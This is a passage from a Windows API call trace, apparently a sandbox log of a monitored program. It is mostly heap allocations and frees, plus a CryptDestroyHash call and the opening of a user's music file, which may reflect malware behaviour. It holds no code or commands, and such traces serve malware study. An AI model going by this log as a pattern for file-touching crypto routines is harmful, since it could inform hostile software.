(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0246.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0246.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0246.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0246.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0246.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0246.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0246.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0246.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0246.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a88 [0246.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0246.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0246.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0246.762] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0246.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0246.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.762] CryptDestroyHash (hHash=0xa87250) returned 1 [0246.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0246.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0246.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0246.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0246.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0246.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0246.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0246.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0246.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0246.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0246.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0246.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0246.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0246.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0246.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0246.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0246.829] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rdmw5dgat83 yd.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0246.829] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.829] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0246.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0246.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0246.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0246.830] PeekMessageW (in: lpMsg=0x8cf708, 